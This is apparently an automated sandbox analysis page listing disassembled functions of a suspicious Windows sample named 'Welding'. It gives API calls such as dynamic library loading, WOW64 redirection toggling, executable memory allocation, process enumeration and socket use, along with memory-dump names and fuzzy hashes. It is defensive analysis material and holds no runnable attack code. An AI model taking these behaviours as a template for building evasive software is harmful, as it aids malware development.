Function 00137D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00137D97
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00137DAC
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00137DB9

Strings

msctls_trackbar32, xrefs: 00137D6E

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 732bcfde5864a9352aad6a921ea9d3221b51d29f025244a84dfd83b5aedf9db8
Instruction ID: 536288d900350e1b17be8b77c0c5477ee0c1094ae9674769cf3874b4f0e6f09e
Opcode Fuzzy Hash: 732bcfde5864a9352aad6a921ea9d3221b51d29f025244a84dfd83b5aedf9db8
Instruction Fuzzy Hash: A211E7B2244209BADF245FA4CC45FE737A9EF89754F114528FB45A60D0D7719851CB20

Function 000B1284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,000B1275,SwapMouseButtons,00000004,?), ref: 000B12A8
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,000B1275,SwapMouseButtons,00000004,?), ref: 000B12C9
RegCloseKey.ADVAPI32(00000000,?,?,?,80000001,80000001,?,000B1275,SwapMouseButtons,00000004,?), ref: 000B12EB

Strings

Control Panel\Mouse, xrefs: 000B12A6

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 55330ab7f532a761c073a0b82274d33b920c1c0abcf67c65bc740f35441f69b0
Instruction ID: 579e05cd345b7700d76c84e119f308bf435e2b1a529e074e131e6485bf6c26fa
Opcode Fuzzy Hash: 55330ab7f532a761c073a0b82274d33b920c1c0abcf67c65bc740f35441f69b0
Instruction Fuzzy Hash: 21115775610208BFDB218FA5DC84EEEBBF8EF09740F504569F905D7220E2319E509BA4

Function 0012C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,000F027A,?), ref: 0012C6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0012C6F9

Strings

GetSystemWow64DirectoryW, xrefs: 0012C6F3
kernel32.dll, xrefs: 0012C6E2

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 4c3020830cc7cc06f7ef6ff9fde7cb647cde8d1b084537c6f3f884b602cec825
Instruction ID: e019d709c88e63f5be7418d6a46d7a8a9ded1e024a326e3c530ed18e5c3bf3fe
Opcode Fuzzy Hash: 4c3020830cc7cc06f7ef6ff9fde7cb647cde8d1b084537c6f3f884b602cec825
Instruction Fuzzy Hash: A5E0C27C2103238FD7215B26DC48A5A76D4FF18B04B408429EA85D2620D774C8C0CF90

Function 000C4B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,000C4B44,?,000C49D4,?,?,000C27AF,?,00000001), ref: 000C4B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000C4B97

Strings

Wow64DisableWow64FsRedirection, xrefs: 000C4B91
kernel32.dll, xrefs: 000C4B80

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 30fe51cbd59f48ad59e44d107cef107bf66d2fab81f79d01fc685a0b813b0fd3
Instruction ID: 2da751817b9cd9a68d73ba89cdc8e71afb4afc7093e4d70cba16d96321931142
Opcode Fuzzy Hash: 30fe51cbd59f48ad59e44d107cef107bf66d2fab81f79d01fc685a0b813b0fd3
Instruction Fuzzy Hash: 98D017B55207128FD7219F32DC28B0A76E4AF09755F11882ED596E2AA0E7B0E8C0DA10

Function 000C4BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,000C4AF7,?), ref: 000C4BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000C4BCA

Strings

Wow64RevertWow64FsRedirection, xrefs: 000C4BC4
kernel32.dll, xrefs: 000C4BB3

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: e346050e3d2b17fcdbeaaf817ed79a51463f2e454df114789fba2b28c094bda4
Instruction ID: cfd5ef26df26cc9a9702125b34c5df70e4f3157cab87eab5527b61a6850b23ee
Opcode Fuzzy Hash: e346050e3d2b17fcdbeaaf817ed79a51463f2e454df114789fba2b28c094bda4
Instruction Fuzzy Hash: 4ED0C7B48203138FD3218F32DC08B0A72E4AF09740B008C6ED486C2AA8EBB0C8C0CA00

Function 00131447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00131696), ref: 00131455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00131467

Strings

advapi32.dll, xrefs: 00131450
RegDeleteKeyExW, xrefs: 00131461

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: a4448e12548cf38011436ae9064508bf7e56a1caa938e62356314972bb94ee36
Instruction ID: 000bd205dc6ad4290b72fb1664be191f950a327a9802c5138348abd2a77d0ebf
Opcode Fuzzy Hash: a4448e12548cf38011436ae9064508bf7e56a1caa938e62356314972bb94ee36
Instruction Fuzzy Hash: 92D01774510713DFD7219F76CC0861676E4AF1B795F11C82E98E6D2560EB70D8C0CA50

Function 000C55F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,000C5E3D), ref: 000C55FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000C5610

Strings

GetNativeSystemInfo, xrefs: 000C560A
kernel32.dll, xrefs: 000C55F9

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: d6abf609164b45a45822fcd7b0de88955b243b290fa0d8222552130f1987978c
Instruction ID: 33704cd920a25ec8e02df7dc29d46fff8d7c03af912d1f077b2b0eb58a609071
Opcode Fuzzy Hash: d6abf609164b45a45822fcd7b0de88955b243b290fa0d8222552130f1987978c
Instruction Fuzzy Hash: 26D01278520B128FE7215F32CC0861B76D4AF09756B11882DD586D2561D770D4C0CA50

Function 001297CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,001293DE,?,00140980), ref: 001297D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001297EA

Strings

GetModuleHandleExW, xrefs: 001297E4
kernel32.dll, xrefs: 001297D3

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: bc0f84dd816fc55ca602efd0552a70f2990cbffcb3f8f1c11329813629a51c85
Instruction ID: 9164d7e114355636c5d1df4527f1010b66cd3c7b4dca029600f82d30b984bb66
Opcode Fuzzy Hash: bc0f84dd816fc55ca602efd0552a70f2990cbffcb3f8f1c11329813629a51c85
Instruction Fuzzy Hash: 63D017B45207238FD7219F36EC88606B6E4AF09791F11C82AD58AE2660EB74C8D0CA11

Function 00107D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f9411183d5d955bbf87ab750c416ca8abc8ff9dc0e46cb14aa9492f3f984ea
Instruction ID: e94c3016d6cad9b81e19c04e0dc83abeb7e1e2cabec4c8796211238997bda26f
Opcode Fuzzy Hash: 44f9411183d5d955bbf87ab750c416ca8abc8ff9dc0e46cb14aa9492f3f984ea
Instruction Fuzzy Hash: 63C17E74A04216EFCB14DF98C884EAEB7B5FF48714B118598F885EB291DB71ED81CB90

Function 000BDD6D Relevance: 6.3, APIs: 4, Instructions: 320registrystringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32 ref: 000BDF82
RegisterHotKey.USER32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000BDFA3

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Registerlstrcmpi
String ID:
API String ID: 2106711513-0
Opcode ID: 548053ac6aca032e77075d6e597fdc19b68be6fb5c2dfc1180b9c233ec3a381c
Instruction ID: 8ec7928d35a696acf95ac74c4a61f8a2a567d28634ff366ef944f37294e38b23
Opcode Fuzzy Hash: 548053ac6aca032e77075d6e597fdc19b68be6fb5c2dfc1180b9c233ec3a381c
Instruction Fuzzy Hash: 24C18D346086019FC724DF28C890FAEB7E1BF99315F14495EFA968B392DB30E940DB52

Function 0012E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0012E7A7
CharLowerBuffW.USER32(?,?), ref: 0012E7EA

Part of subcall function 0012DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0012DEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0012E9EA
_memmove.LIBCMT ref: 0012E9FD

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: b582ef73d7683e7a3c9ee3f7a0a379389df6470e5cb70e04c600b94e314b1127
Instruction ID: 683be9da2a3bf69c9b05b2aee75bb682e8d120d7efff6cef73416bc2e8257df0
Opcode Fuzzy Hash: b582ef73d7683e7a3c9ee3f7a0a379389df6470e5cb70e04c600b94e314b1127
Instruction Fuzzy Hash: 10C17B716083118FC714DF28D480AAABBE4FF89714F14896EF8999B352D731E946CF92

Function 0012877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001287AD
CoUninitialize.OLE32 ref: 001287B8

Part of subcall function 0013DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00128A0E,?,00000000), ref: 0013DF71

#8.OLEAUT32(?), ref: 001287C3
#9.WSOCK32(?), ref: 00128A94

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID:
API String ID: 948891078-0
Opcode ID: 97671882786a9a072ffc9853a741deaeb4802676be8b8e3e8d855ea264172c0d
Instruction ID: 95e106feca787ba79edf994682ee6c3467a94da002d14d9f6927714192a8fd55
Opcode Fuzzy Hash: 97671882786a9a072ffc9853a741deaeb4802676be8b8e3e8d855ea264172c0d
Instruction Fuzzy Hash: 75A158752047119FDB14EF14D481BAAB7E4BF88314F148849F9969B3A2CB30ED50CB96

Function 0010814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00143C4C,?), ref: 00108308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00143C4C,?), ref: 00108320
CLSIDFromProgID.OLE32(?,?,00000000,00140988,000000FF,?,00000000,00000800,00000000,?,00143C4C,?), ref: 00108345
_memcmp.LIBCMT ref: 00108366

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 44493fcc599492dd25c1e68a8ec5607d416bac4906a5eeb2956a7e5c4286b4d4
Instruction ID: 20fa58c4cbb02046e10edd6595707e55c17c23ab4263e5b53b988eb08fcd28f3
Opcode Fuzzy Hash: 44493fcc599492dd25c1e68a8ec5607d416bac4906a5eeb2956a7e5c4286b4d4
Instruction Fuzzy Hash: 46813975A00109EFCB04DFD4C984EEEB7B9FF89315F204558E556AB2A0DB71AE06CB60

Function 0010749B Relevance: 6.2, APIs: 4, Instructions: 202COMMON

Download Yara Rule

APIs

#8.OLEAUT32(?,?,?,00000001,?,?,?,?,?,?,?,?,?,0010779C,?,?), ref: 001074AC
#2.WSOCK32(00000000,?,?,?,?,0010779C,?,?,00129B28,?,?,?,?), ref: 00107555
#10.WSOCK32(?,?,?,?,?,?,?,0010779C,?,?,00129B28,?,?,?,?), ref: 00107584
#9.WSOCK32(?,00000000,?,?,?,?,?,0010779C,?,?,00129B28,?,?,?,?), ref: 001075AB

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f0c9efd1dd14d34d974eef4fa526702dcf98088199a08dac8464aaa222c20f8
Instruction ID: 41eff9fb4b01e186ffdaf5261538e55a6ea2d949c19873126d468c251bfc6bdb
Opcode Fuzzy Hash: 7f0c9efd1dd14d34d974eef4fa526702dcf98088199a08dac8464aaa222c20f8
Instruction Fuzzy Hash: 02519630E087059AD724AF79D895A7DB3E5AF55310B20881FE5C7C76E2EBB1B8808B15

Function 0012F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0012F526
Process32FirstW.KERNEL32(00000000,?), ref: 0012F534

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

Process32NextW.KERNEL32(00000000,?), ref: 0012F5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0012F603

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 6e3aa0adc9f6a594a823297dbcd9b860336312bf79c43624c79ecd024c1c6a84
Instruction ID: 62dfc59d2ff7d7d2a17bac37d29a3fe0825dd7caf68a81d90e235dbf9ad4555c
Opcode Fuzzy Hash: 6e3aa0adc9f6a594a823297dbcd9b860336312bf79c43624c79ecd024c1c6a84
Instruction Fuzzy Hash: D3514D715043119FD310EF24D886FAFB7E8EF99710F40492DF595972A2EB709A05CB92

Function 000BE7F7 Relevance: 6.2, APIs: 4, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000BE937
_memmove.LIBCMT ref: 000BE9D0
_free.LIBCMT ref: 000BE9F6
CloseWindowStation.USER32 ref: 000BEA0C
_memmove.LIBCMT ref: 000BEAA9

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _memmove$CloseStationWindow_free
String ID:
API String ID: 1521518989-0
Opcode ID: ed0154cc120d78a3508f01fa16b94eee65d8ce49247bc505798d47d38e5d47be
Instruction ID: 2a5f6276fccbcb3c1f36c807d585b215924c61f883e3cbc10495b203677d216c
Opcode Fuzzy Hash: ed0154cc120d78a3508f01fa16b94eee65d8ce49247bc505798d47d38e5d47be
Instruction Fuzzy Hash: 985138716087419FDB64CF28C890BAFBBE5BF89314F54492DE98987361EB31E841CB52

Function 00139E19 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00139E88
ScreenToClient.USER32(00000002,00000002), ref: 00139EBB
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00139F28

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

